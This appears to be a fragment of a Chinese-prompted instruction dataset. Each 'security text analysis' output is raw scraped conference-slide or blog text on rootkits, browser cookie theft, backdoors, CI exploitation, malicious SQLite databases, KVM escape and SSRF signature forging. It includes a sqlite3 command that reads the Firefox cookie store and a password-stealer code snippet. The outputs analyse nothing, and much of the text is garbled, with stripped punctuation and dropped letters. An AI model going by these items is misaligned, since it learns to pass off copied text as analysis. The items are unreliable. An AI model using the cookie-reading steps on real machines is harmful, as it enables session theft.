network  connections. VI. connect  backdoor. VII. multi  thread  port  scanner. VIII. http  download. IX. multi  thread  ssh passwd crack. ü TARGET  OS I. centos II. rhel III. ubuntu IV. debian V. fedora VI. freebsd The  life  of  `ls` ls ->  glibc/opendir()  ->  syscall/sys_getdents()  ->  vfs/vfs_readdir()  ->  ext4/ext4_readdir() preload                          hook  sct hjack vfs inline  hook  What  is  the  NEXT?    ls ->  bash  ->  shell  function  ->  builtin ->  hashtable ->  $PATH  ->  command_not_found_handle/exit ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nClient-Side HTTP Cookie Security: Attack and Defense David Wyde DEF CON 22 Game Plan  Why are HTTP cookies valuable to attackers?  How do popular web browsers store cookies?  How can cookies be stolen?  How can cookies be protected? Disclaimers  The opinions in this presentation are mine, and not my employers.  The security issues I discuss are not specific to any one website, and are not vulnerabilities in the conventional sense. What is an HTTP Cookie?  Cookies are transmitted as HTTP headers  Name-value pairs  HTTP clients store state using cookies  E.g., trade credentials for a session cookie Cookies in Action User-Readable Data  Any process that runs as your user can read:  Your private keys  Some software saves passwords as plaintext  Web browser cookies  Damage is done without privilege escalation Cookies Are Valuable to Attackers  Cookies can be more valuable than passwords  Gmail: bypass two-factor authentication  Facebook: don't warn of login from a new device  Counterpoints  \"Please re-enter your password  Cookies expire Gmail: Two-Factor Authentication Facebook: New Login Email Browser Cookie Storage Cookie Storage: Intro  Almost all browsers store cookies as plaintext  The HttpOnly and Secure flags apply inside browsers  Malware need not respect them Firefox  Stores cookies in an SQLite database  Cookies can be read using sqlite3, Python, etc. Reading Firefox Cookies $ sqlite3 ~/Library/Application\\ Support/Firefox/Profiles/*/cookies.sqlite SQLite version 3.7.13 2012-07-17 17:46:21 Enter \".help\" for instructions Enter SQL statements terminated with a \";\" sqlite> .schema CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, baseDomain TEXT, appId INTEGER DEFAULT 0, inBrowserElement INTEGER DEFAULT 0, name TEXT, value TEXT, host TEXT, path TEXT, expiry INTEGER, lastAccessed INTEGER, creationTime INTEGER, isSecure INTEGER, isHttpOnly INTEGER, CONSTRAINT moz_uniqueid UNIQUE (name, host, path, appId, inBrowserElement)); CREATE INDEX moz_basedomain ON moz_cookies", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n第四季是一个过渡季过渡后门在对抗升级中由传统后门衍生成锁定目标的制定后门引用百度百科的后门程序\"的相关解释 https://baike.baidu.com/item/%E5%90%8E%E9%97%A8%E7%A8%8B%E5%BA%8F/108154 安全从业人员其实至少一直在与传统后门对抗比如最常见的webshell免杀与webshell过waf应急中的样本取证查杀远控残留文件等但是webshell远控仅仅又是backdoor的其中一种 这里按照上几季的风格继续引用几个概念只有概念清晰才能了解如何对抗 1安全从业人员为什么要了解后门 防御是以市场为核心的而不是以项目为核心需要对抗的可能是黑产从业者的流量劫持相关 后门或者是政治黑客的高持续渗透权限把控后门等 2攻击人员为什么要了解后门 随着对抗传统后门的产品越来越成熟由特征查杀到行为查杀到态势感知到大数据联合特征溯源锁定如何反追踪是一个非常值得思考的问题 3后门与项目的关联是什么 某项目被入侵应急并加固解决若干天后再次被入侵依然篡改为某博彩导致安全从业人员客户之间的问题 4后门与安全产品的关联是什么 某客户购买某安全产品套装在实战中一般由非重点关注服务器迂回渗透到核心服务器来跨过安全产品监控得到相关权限后后门起到越过安全产品它会涉及对其他附属安全产品的影响如客户质疑为什么我都买了你们的套装还被入侵并且这还是第二次了 思维跳出以上4条来看下进一年的部分相关安全事件 ![](media/df3613fba39b2e12f4468efe53262e8f.jpg) ![](media/27fae96ce75d6b1614e5033ff285c4dc.jpg) ![](media/9585fc63c8b91af89f4bc83cf0731305.jpg) ![](media/397f5aed69e279eb6c30555f8225ee92.jpg) 思维跳出以上4条安全事件这里再一次引入百度百科的APT的主要特性 **潜伏性**这些新型的攻击和威胁可能在用户环境中存在一年以上或更久他们不断收集各种信息直到收集到重要情报而这些发动APT攻击的黑客目的往往不是为了在短时间内获利而是把被控主机当成跳板持续搜索直到能彻底掌握所针对的目标人事物所以这种APT攻击模式,实质上是一种恶意商业间谍威胁 **持续性**由于APT攻击具有持续性甚至长达数年的特征这让企业的管理人员无从察觉在此期间这种持续性体现在攻击者不断尝试的各种攻击手段以及渗透到网络内部后长期蛰伏 **锁定特定目标**针对特定政府或企业长期进行有计划性组织性的窃取情报行为,针对被锁定对象寄送几可乱真的社交工程恶意邮件如冒充客户的来信,取得在计算机植入恶意软件的第一个机会 **安装远程控制工具**攻击者建立一个类似僵尸网络Botnet的远程控制架构攻击者会定期传送有潜在价值文件的副本给命令和控制服务器(C&C Server)审查将过滤后的敏感机密数据利用加密的方式外传 一次针对特定对象长期有计划性渗透的本质是什么窃取数据下载到本地或者以此次渗透来达到变现目的引用如图 ![](media/13f06d366af1efb0e2ca128107bbc7be.jpg) ![](media/4b3ab99681d5270a521d6c752b4104bb.jpg) 一次具有针对性的渗透绝对不单单是以渗透DMZ区为主重要资料一般在内网服务器区包括但不限制于数据库服务器文件服务器OA服务器与内网办公区包括但不限制于个人机开发机财务区等而往往这样的高级持续渗透不能是一气呵成需要一定时间内来渗透到资料所在区域而这里其中一个重要的环节就是对后门的要求在渗透期间内包括但不限制于一周到月甚至到年以保持后续渗透 传统型的后门不在满足攻击者的需求而传统型的木马后门大致可分为六代 第一代是最原始的木马程序主要是简单的密码窃取通过电子邮件发送信息等具备了木马最基本的功能 第二代在技术上有了很大的进步冰河是中国木马的典型代表之一 第三代主要改进在数据传递技术方面出现了ICMP等类型的木马利用畸形报文传递数据增加了杀毒软件查杀识别的难度 第四代在进程隐藏方面有了很大改动采用了内核插入式的嵌入方式利用远程插入线程技术嵌入DLL线程或者挂接PSAPI实现木马程序的隐藏甚至在Windows NT/2000下都达到了良好的隐藏效果灰鸽子和蜜蜂大盗是比较出名的DLL木马 第五代驱动级木马驱动级木马多数都使用了大量的Rootkit技术来达到在深度隐藏的效果并深入到内核空间的感染后针对杀毒软件和网络防火墙进行攻击可将系统SSDT初始化导致杀毒防火墙失去效应有的驱动级木马可驻留BIOS并且很难查杀 第六代随着身份认证UsbKey和杀毒软件主动防御的兴起黏虫技术类型和特殊反显技术类型木马逐", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Slot Machine Reloaded Category: Reversing, 300 Points ## Description > Remember the Slot Machine from CSA 2019? > > Well, this one is a little harder... ```python #!/usr/bin/env python3 import random import collections import math from .secret import flag PRINTABLE = \"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!\\\"#$%&'()*+-/:.;<=>?@[]_`{}\" flag_len = len(flag) NO_COINS = \"NO MORE COINS! GOODBYE.\" NOT_ENOUGH_COINS = \"YOU DON'T HAVE ENOUGH COINS!\" INVALID_COIN_NUMBER = \"COIN NUMBER CAN'T BE NEGATIVE\" INITIAL_COINS = 10 class Slotmachine(object): def __init__(self): seed = random.SystemRandom().getrandbits(64) # Using SystemRandom is slow, use only for seed. self.random = random.Random(seed) # This will make sure no one messes with my seeds! self.slots = [list(PRINTABLE) for i in range(flag_len)] self.attempt_num = 0 self.total_coins = INITIAL_COINS self.last_result = \"\" self.last_gamble = 0 def get_prize(self): result = self.last_result prize = sum([x for x in collections.Counter(result).values() if x > 2]) prize *= self.last_gamble self.total_coins += prize return prize def prepend_flag(self): for i in range(flag_len): self.slots[i].remove(flag[i]) self.slots[i] = [flag[i]] + self.slots[i] def check_invalid_input(self, coins): if self.total_coins <= 0: self.last_result = \"\" return NO_COINS if self.total_coins < coins: self.last_result = \"\" return NOT_ENOUGH_COINS if coins < 0: self.last_result = \"\" return INVALID_COIN_NUMBER return None # My cat wrote this function def choice(self): rand_num = format(self.random._randbelow((1 << (flag_len*len(f'{len(PRINTABLE) - 1:b}'))) - 1), '#0%db' % (len(self.slots)*int(math.log(len(PRINTABLE), 2)) + 2))[2:] result = \"\" j = 0 for i in range(0,len(rand_num),len(f'{len(PRINTABLE) - 1:b}')): result += self.slots[j][int(rand_num[i:i+len(f'{len(PRINTABLE) - 1:b}')],2)] j += 1 return result def spin(self, coins): invalid_message = self.check_invalid_input(coins) if invalid_message: return invalid_message.center(flag_len) self.last_gamble = ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 论文日读From TTP to IoC- Advanced Persistent Graphs for Threat Hunting ## 概要 论文Berady, Aimad, Mathieu Jaume, Valerie Viet Triem Tong and Gilles Guette. From TTP to IoC: Advanced Persistent Graphs for Threat Hunting. *IEEE Transactions on Network and Service Management* 18, 2 (6/2021): 132133. https://doi.org/10.1109/TNSM.2021.3056999. 该论文主要是围绕威胁狩猎的事件响应阶段提出一个高级持久图模型用以评估和改进检测策略提取可用的威胁情报IOCs如题所示即使用图模型将TTP型情报转化为IOC型情报本质上是利用图模型挖掘攻击实体关系将高维度数据进行降维的一个过程同时论文使用APT29的攻击行为来验证和评估模型 主要的研究步骤是 - 在全知视角下对比攻击者和防御者的感知差距 - 对比攻击者意识到的留在网络上的痕迹 - 防御者通过识别误报调整检测策略来提升识别质量 使用APT29的真实攻击活动进行验证的过程 - 模拟攻击模型APT29的TTPs测试防御架构质量 - 分析日志通过分析误报和告警调整检测策略 - 提取IOC提取可用的CTI主要为IOC类型 该论文认为威胁狩猎是一个敏捷迭代的过程使用该套高级持久图模型可以快速从模拟攻击行为的高维度TTP中提取可落地检测的IOC型情报 ## 笔记 ![image-20211110112136692](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/image-20211110112136692.png) 图模型结构展示 ![image-20211110113338617](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/image-20211110113338617.png) 图通过APT模拟攻击行为所得的图**G**𝐴", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExploiting Continuous Integration (CI) and Automated Build Systems And introducing CIDER Whoami  SpaceB0x  Sr.+Security+Engineer+at+LeanKit  Application+and+network+security+(offense+and+defense)  I+like+breaking+in+to+systems,+building+systems,+and+learning  Security+consultant ./agenda.sh  Overview+of+Continuous+Integration+concepts  Configuration+Vulnerabilities+vs.+Application+Vulnerabilities  Real+world+exploit+#1+  Common+Bad-practices  Real+world+exploit+#2+ Attacking+the+CI+provider  Introduce+CIDER Continuous1Integration1 Continuous1Integration1(CI)  Quick+iterative+release+of+code+to+production+servers  Usually+Many+iterations+per+week+or+even+per+day.+  Repository+centric  In+sync+with+Automated+Build  For+infrastructure/servers/subnets+etc.+ Microservices  Breaking+down+large+app+into+small+decoupled+components  These+components+interact+with+each+other  Eliminates+single+points+of+failure  Autonomous+development Security1Implications  Good+- Frequent+release+cycles+are+fabulous!  Good+- Faster+code+deployments+=+quick+remediation  Good+- Decoupled+systems+reduced+single+points+of+failure  Good+- Compromise+of+one+service+doesnt+(always)+mean+full+pwnage Security1Implications  Good+- Frequent+release+cycles+are+fabulous!  Good+- Faster+code+deployments+=+quick+remediation  Good+- Decoupled+systems+reduced+single+points+of+failure  Good+- Compromise+of+one+service+doesnt+(always)+mean+full+pwnage  Bad+- Fast+release+sometimes+means+hasty+oversights  Bad+ Automated+Deployment+systems+arechecked less+than+the+code+ that+they+deploy+ Tools Build1Systems  Take+code+and+build+conditionally  Typically+in+a+quasi+containerized+type+of+environment  Both+local+and+cloud+based+are+popular  Vendor: ØTravis-CI ØCircle-CI ØDrone ØTeamCity ØBuildKite Deployment1Systems  Deploy+the+code+after+build  Heading+more+and+more+toward+container+driven  Vendors ØJenkins ØOctopus+Deploy ØKubernetes ØRancher ØMesosphere Chains1of1Deployment Chains1of1Deployment Chains1of deployme", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport struct, string, sys s = open(\"code\", \"rb\").read() s=s[4:] al = string.uppercase instructions = [] for i in range(len(s)/16): tp, reg, n1, n2 = struct.unpack(\"<IIII\", s[i*16:i*16+16]) instructions.append((tp, reg, n1, n2)) for i, ins in enumerate(instructions): tp, reg, n1, n2 = ins print \"%02d:\" % i, if tp == 0: print \"r\"+al[reg]+\"++; jmp %02d;\"%n1 elif tp == 1: print \"if (r\"+al[reg]+\"!=0){ r\"+al[reg]+\"--; jmp %02d\"%n1+\";} else jmp %02d;\"%n2 else: print \"fork @ %02d\"%n1+\"; copy up to r\"+al[reg]+\"; jmp %02d;\"%n2 regs = [0]*26 regs[0] = int(sys.argv[1]) count = [0]*120 def fibmod(n, m): if n<=1: return n%m a = 0 b = 1 for i in range(n): c = (a+b)%m a=b b=c return a def collatz(n): if n % 2 == 0: return n/2 else: return 3*n+1 remc=[-1 for i in range(10000)] remc[0]=0 remc[1]=0 def collatzcnt(n): if n>=len(remc): return 1+collatzcnt(collatz(n)) while remc[n]==-1: remc[n] = 1+collatzcnt(collatz(n)) return remc[n] for i in range(10000): collatzcnt(i) print \"preproc\" rem=[0] def sumcollatzcnt(n): if n<=len(rem): return rem[n] s = rem[-1] for i in range(len(rem)+1, n+1): s += collatzcnt(i) rem.append(s) return s def run(regs, pc): while pc!=len(instructions): count[pc]+=1 # peephole if pc == 116: regs[0] = regs[1] break elif pc==113: regs[0] = max(0, regs[1]-regs[2]) break elif pc==108: if regs[2]>regs[1]: regs[0] = 1 else: regs[0] = 0 break elif pc==99: regs[0] = regs[1] % regs[2] break elif pc ==84: regs[0] = regs[1] break elif pc == 92: regs[0]=regs[2]/2 regs[1]=regs[2]%2; break elif pc == 45: regs[0] = collatz(regs[1]) break elif pc == 64: regs[0] = fibmod(regs[1], regs[2]) break elif pc == 29: regs[0] = collatzcnt(regs[1]) break elif pc == 20: regs[0] = sumcollatzcnt(regs[1]) break elif pc == 0: a = regs[0] if a<11: regs[0] = 0 else: s = sumcollatzcnt(a) print hex(s) regs[0] = fibmod(a, s) break ins = instructions[pc] tp, reg, n1, n2 = ins if tp==0: regs[reg]+=1 pc = n1 elif tp==1: if regs[reg]: regs[reg] -= 1 if pc == n1: regs[reg] = 0 pc = n1 else: pc = n2 els", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfrida 0x00 443flagssl IDAIDAVPN 443 0x01 Atrust frida idapwnLinuxfrida idakpi pwn  frida 1. webvpn 2. ida 3. hook fridavpnhookfuzz 0x02 fridafridafrida apkapkapkfridaobjection Linuxmacwindowshookfridafridahook fridahook demofrida-traceclihook vpn ps -ef | grep ECAgent //pid sudo /home/miku/miniconda3/envs/py3.8/bin/frida-trace -i \"recv\" -p 1328 //attach pidhookrecv sorecvhookjshook sudo vim /home/miku/__handlers__/libc_2.27.so/recv.js hookonEnteronLeavehook recvlibpthread_2.27.sorecv hook 0x03 bodyECAgentwritereadsocket hookbody writeread writereadfdbufbodybufhookbuf onEnteronLeavehookhook onEnter(log, args, state) //argsfdbuf onLeave(log, retval, state) //args hookwritewritebuffdonEnterbufonEnter bufhook readreadonEnterbufreadbuf onLeavebufonLeaveargs JavaScript api nativepointer emmm 0x04 linuxvpnfrida fridaidaserverfrida Fridahookappfrida frida serverhookapp 0x05 frida frida", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n一次诡异的弱口令 0x01 背景 某次客户授权渗透碰到的问题比较有趣分享一下 项目开始没多久一起的小姐妹说存在弱口令admin/admin让我试试然而在我尝试登录的时候返 回消息为密码错误失败次数为1这没法登录密码不对阿还有账号锁定机制 继续测试发现登录页面验证码在使用后未作失效处理正常操作爆破一下 burp的结果显示四五个账号存在弱口令手动验证下只有两个账号使用密码正常登录了其他账号都 返回密码错误的消息 弱口令登录不能复现非常诡异讲给客户估计会被客户加开发一起喷死于是我就请教了一下我大 哥 大哥如此清新脱俗的解释一直喊666的我灵魂在吹牛逼的过程中莫然得到了一丝的愉悦然而作为 打工人想了想午饭的馒头还没有着落只能埋头继续肝 0x01 剥茧抽丝 shell手法平平无奇标准操作过了下WAF的内容检测此处不做赘述直奔登录模块拿到对应class文 件 class文件导入jd-gui好了可以下打死开发了 bingo破案 浏览器启动admin账户到位输入若干次口令直到账号锁定等待一段时间待锁定时间过后输入 admin任意密码成功登陆了系统 0x02 修复方式 显然开发小哥写的代码太绕了把自己绕进去了 针对上述的写法在state为2后锁定一段时间再次登录账户解锁之后还需要再校验密码而不是 直接返回true 0x03 总结 账户锁定的情况也可以多试几次既然是账号锁定功能时间也应该是测试参数正如老话说时间是 最好的解药", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSELECT code_execution FROM * USING SQLite; -- gaining code execution using a malicious SQLite database Omer Gull Check Point Research whoami  Omer Gull  Vulnerability Researcher  Check Point Research for the past 3 years  Now at Hunters.AI Agenda  Motivation and back story  SQLite3 Intro  Examining the attack surface of a malicious DB  Previous work  Memory corruptions exploitation using pure SQL  Query Oriented Programming  Demos  Future work and conclusion Motivation  SQLite is one of the most deployed software modules  Querying an SQLite database is CONSIDERED SAFE  Spoiler: its not Prologue  Password stealers!  A computer gets infected  Malware collects stored credentials maintained by various clients  Some client software store your secrets in SQLite databases  Malware sends SQLite DBs to C2 server  C2 extracts secrets and stores the loot How It all Began  So one day, @Omriher and I were looking at the leaked sources of a notorious password stealer and thought to ourselves  These guys just harvest a bunch of our DBs and parse them in their back- end  Can we leverage the load and query of an untrusted database to our advantage?  Could have much bigger implications in countless scenarios as SQLite is so popular  And so began the longest CTF challenge SQLite3  Unlike most other SQL databases, SQLite does not have a client server architecture  SQLite reads and writes directly to files  A complete DB with multiple tables, indices, triggers and views is contained in a single file Examining the Attack Surface  sqlite3_open($FileDB)  sqlite3_query(SELECT..) private function processnote($Data) { $FileDB = GetTempFile('notezilla'); if(!file_put_contents($FileDB, $Data)) return FALSE; $db = new SQLite3($FileDB); if(!$db) return FALSE; $Datax = $db->query('SELECT BodyRich FROM Notes'); $Result = ''; while($Element = $Datax->fetchArray()) { $Data__ = rtf2text($Element['BodyRich']); if(strlen($Data__)) { $Result .= $Data__; $Result .= str_pad(\"\", 30, \"-\") . \"\\r\\n\"; } } $this", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVirtunoid: Breaking out of KVM Nelson Elhage July 25, 2011 Nelson Elhage () Virtunoid: Breaking out of KVM July 25, 2011 1 / 42 Outline 1 KVM: Architecture overview Attack Surface 2 CVE-2011-1751: The bug 3 virtunoid.c: The exploit %rip control Getting to shellcode Bypassing ASLR 4 Conclusions and further research 5 Demo Nelson Elhage () Virtunoid: Breaking out of KVM July 25, 2011 2 / 42 KVM: Architecture overview KVM: The components kvm.ko kvm-intel.ko / kvm-amd.ko qemu-kvm Nelson Elhage () Virtunoid: Breaking out of KVM July 25, 2011 3 / 42 KVM: Architecture overview kvm.ko The core KVM kernel module Provides ioctls for communicating with the kernel module. Primarily responsible for emulating the virtual CPU and MMU Emulates a few devices in-kernel for efficiency. Contains an emulator for a subset of x86 used in handling certain traps (!) Nelson Elhage () Virtunoid: Breaking out of KVM July 25, 2011 4 / 42 KVM: Architecture overview kvm-intel.ko / kvm-amd.ko Provides support for Intels VMX and AMDs SVM virtualization extensions. Relatively small compared to the rest of KVM (one .c file each) Nelson Elhage () Virtunoid: Breaking out of KVM July 25, 2011 5 / 42 KVM: Architecture overview qemu-kvm Provides the most direct user interface to KVM. Based on the classic qemu x86 emulator. Implements the bulk of the virtual devices a VM uses. Implements a wide variety of possible devices and buses. An order of magnitude more code than the kernel module. Nelson Elhage () Virtunoid: Breaking out of KVM July 25, 2011 6 / 42 KVM: Architecture overview Control flow Nelson Elhage () Virtunoid: Breaking out of KVM July 25, 2011 7 / 42 KVM: Architecture overview Attack Surface kvm.ko A tempting target  successful exploitation gets ring0 on the host without further escalation. Much less code than qemu-kvm, and much of that is dedicated to interfacing with qemu-kvm, not the guest directly. The x86 emulator is an interesting target. A number of bugs have been discovered allowing privesc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2021/12/15 下午2:02 记次SSRF漏洞挖掘 - depy https://blog.happysec.cn/index/view/375.go 1/3 depy 记一次SSRF漏洞挖掘 2021年12月15日 / 网络安全 入口点发现 找到一处接口,结构如下 各参数组成 1.src 文件地址 2.type 文件类型 3.access_key 请求密钥这里默认 4.src_sig 文件签名 5.expire 有效期这里默认为0 永久有效 通过参数fuzz可知,文件签名与其他四要素有关如果没有五要素匹配,则无法访 问文件 分析 文件签名长40位,推测是sha1加密且与四要素有关联性,故无需碰撞 所以任务是,推测出src_sig的生成方法 https://***.***.***/***?src=内图地址&type=jpg&access_key=previ 2021/12/15 下午2:02 记次SSRF漏洞挖掘 - depy https://blog.happysec.cn/index/view/375.go 2/3 本来一开始,只有4个要素的时候,我可以自动排列组合拼接测试了几十次,却没 有一次成功怀疑缺少其他默认数据或者是加了畸形变化,当然也有可能是加了 盐 如果sig加了盐或者做了奇怪的变化算法不是简单的拼接比如把某项值md5一 下再拼接那基本就不用破解了如果没有,我们需要找一下是否还有其他的默 认元素 对于一个文件的默认元素,并且还方便提取的估计只有文件md5了下载文件到本 地,做一次md5 拿到hash之后我们的排列组合的元素达到了5个这时组合的成本实在太高 了毕竟有120种组合方式,得一直弄好几个小时 脚本编写 现在我们需要对五个元素排列组合 1.0 2.access_key 3.jpg 4.文件地址 5.文件md5 使用到python3中的itertools库和hashlib库 设置target为我们的目标src_sig,代码大致如下 import itertools import hashlib 2021/12/15 下午2:02 记次SSRF漏洞挖掘 - depy https://blog.happysec.cn/index/view/375.go 3/3 非常幸运的是破解成功了 可以看到是一个ak排列第一,时间戳排最后的拼接生成sha1方式 于是我们就可以伪造地址和sig来做内网ssrf请求了 strs = [] #需要排列组合的元素列表 target = \"\" #标sha1 data = '' count = 0 for i in itertools.permutations(strs,len(strs)): #根据元素列表个数 count= count+1 for j in range(0,len(strs)): #拼接元素 data = i[j]+data a = (hashlib.sha1(data.encode(\"utf-8\")).hexdigest()) #做sha1 print(a) if(a == target): print('签名验证成功') #签名匹配 print(i) #成这个元素的排列式 print() print(str(count))", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### pyc文件的code object介绍 > 在我们导入 python 脚本时在目录下会生成个一个相应的 pyc 文件是pythoncodeobj的持久化储存形式,加速下一次的装载 ### pyc文件的文件结构 pyc文件由三大部分组成 - 最开始4个字节是一个Maigc int, 标识此pyc的版本信息 - 接下来四个字节还是个int,是pyc产生的时间 - 序列化的 PyCodeObject,结构参照[include/code.h](https://github.com/python/cpython/blob/master/Include/code.h),序列化方法[python/marshal](https://github.com/python/cpython/blob/master/Python/marshal.c) ### pyc完整的文件解析参照 - [Python程序的执行原理](http://python.jobbole.com/84599/) - [PYC文件格式分析](http://kdr2.com/tech/python/pyc-format.html) ### 关于co_code介绍 一串二进制流,代表着指令序列,具体定义在[include/opcode.h](https://github.com/python/cpython/blob/fc7df0e664198cb05cafd972f190a18ca422989c/Include/opcode.h)中,也可以参照[python opcodes](http://unpyc.sourceforge.net/Opcodes.html) 由 - 指令(opcode),分为有参数和无参数两种,以 https://github.com/python/cpython/blob/fc7df0e664198cb05cafd972f190a18ca422989c/Include/opcode.h#L69 划分 - 参数(oparg) python3.6 以上参数永远占1字节,如果指令不带参数的话则以`0x00`代替,在运行过程中被解释器忽略,也是**Stegosaurus**技术原理;而低于python3.5的版本中指令不带参数的话却没有`0x00`填充 ### pyc文件的相关例题解析 **[Hackover CTF 2016 : img-enc](https://github.com/ctfs/write-ups-2016/tree/master/hackover-ctf-2016/forensics/img-enc)** 首先尝试pycdc反编译失败 ```python # Source Generated with Decompyle++ # File: imgenc.pyc (Python 2.7) import sys import numpy as np from scipy.misc import imread, imsave def doit(input_file, output_file, f): Unsupported opcode: STOP_CODE img = imread(input_file, flatten = True) img /= 255 size = img.shape[0] # WARNING: Decompyle incomplete ``` 注意到是python2.7,也就是说指令序列共占1字节或3字节(有参数无参数) 使用pcads得到 ```xml imgenc.pyc (Python 2.7) ... 67 STOP_CODE 68 STOP_CODE 69 BINARY_DIVIDE 70 JUMP_IF_TRUE_OR_POP 5 73 LOAD_CONST 3: 0 76 LOAD_CONST 3: 0 79 BINARY_DIVIDE ``` 定位到出错的地方,观察发现 `LOAD_CONST LOAD_CONST BINARY_DIVIDE STORE_FAST opcodes (64 03 00 64 03 00 15 7d 05 00)`被破坏了,根据上下文线索修复后 ```xml 00000120 64 04 00 6b 00 00 72 ce 00 64 03 00 64 03 00 15 |d..k..r..d..d...| 00000130 7d 05 00 64 03 00 64 03 00 15 7d 05 00 64 03 00 |}..d..d...}..d..| 00000140 64 03 00 15 7d 05 00 64 03 00 64 03 00 15 7d 05 |", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport numpy as np sbox = [ 0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76, 0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0, 0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15, 0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75, 0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84, 0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF, 0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8, 0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2, 0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73, 0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB, 0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79, 0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08, 0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A, 0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E, 0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF, 0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16 ] hamm = [bin(i).count('1') for i in range(256)] def hypothesis(inputs, outputs, traces, byte_num, byte_check): best_corr = 0 x = np.zeros(len(traces)) for i in range(len(traces)): x[i] = hamm[sbox[inputs[i][byte_num]  byte_check]] traces1 = traces.T for trace_pos in range(len(traces[0])): y = traces1[trace_pos] r = abs(np.corrcoef(x, y)[0][1]) if r > best_corr: best_corr = r return best_corr def find_byte(inputs, outputs, traces, by", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nYour Mind: Legal Status, Rights and Securing Yourself Tiffany Rad and James Arlen DEFCON17 August 2nd, 2009 2009-08-02 Your Mind: Legal Status, Rights and Securing Yourself - DEFCON17 2 Were going to make your brain hurt. In a good way. The hurt might even save your brain. Disclaimer: Neither of us are speaking for our employers. We promise not to break the world. 2009-08-02 Your Mind: Legal Status, Rights and Securing Yourself - DEFCON17 3 Tiffany Strauchs Rad, MA, MBA, JD  President of ELCnetworks, LLC., o Business consulting, legal services, and security consulting  Part-time Adjunct Professor in the computer science department at the University of Southern Maine o computer law and ethics, information security  Establishing a computer crimes clinic at Maine School of Law and law Fellow for cyber crimes and computer law class  Organizer of HackME, a hacker space in Portland, Maine 2009-08-02 Your Mind: Legal Status, Rights and Securing Yourself - DEFCON17 4 James Myrcurial Arlen, CISA  Part-time Security Consultant o Fortune 500, Profit 50, based in Toronto  Part-time Chief Information Security Officer at a mid-sized financial  Part-time stringer for Liquidmatrix Security Digest  Full-time push-the-envelope next-gen super-duper visionary strategitarian  Founder of think|haus, a hacker space in Hamilton, Ontario 2009-08-02 Your Mind: Legal Status, Rights and Securing Yourself - 